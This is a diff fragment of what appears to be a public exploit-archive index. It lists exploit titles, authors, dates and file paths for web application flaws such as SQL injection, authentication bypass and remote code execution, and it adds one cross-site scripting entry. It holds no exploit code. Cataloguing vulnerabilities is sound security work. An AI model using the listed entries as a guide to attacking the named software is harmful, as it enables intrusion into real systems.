-44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - SQL Injection",2018-02-16,"Shayan S",webapps,asp,443
+44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - X-Path Injection",2018-02-16,"Shayan S",webapps,asp,443
 44100,exploits/php/webapps/44100.txt,"TV - Video Subscription - Authentication Bypass SQL Injection",2018-02-16,L0RD,webapps,php,80
 44101,exploits/php/webapps/44101.py,"UserSpice 4.3 - Blind SQL Injection",2018-02-16,"Dolev Farhi",webapps,php,80
 44102,exploits/php/webapps/44102.txt,"Twig < 2.4.4 - Server Side Template Injection",2018-02-16,JameelNabbo,webapps,php,80
@@ -38924,3 +38936,4 @@ id,file,description,date,author,type,platform,port
 44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
 44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
 44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,
+44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,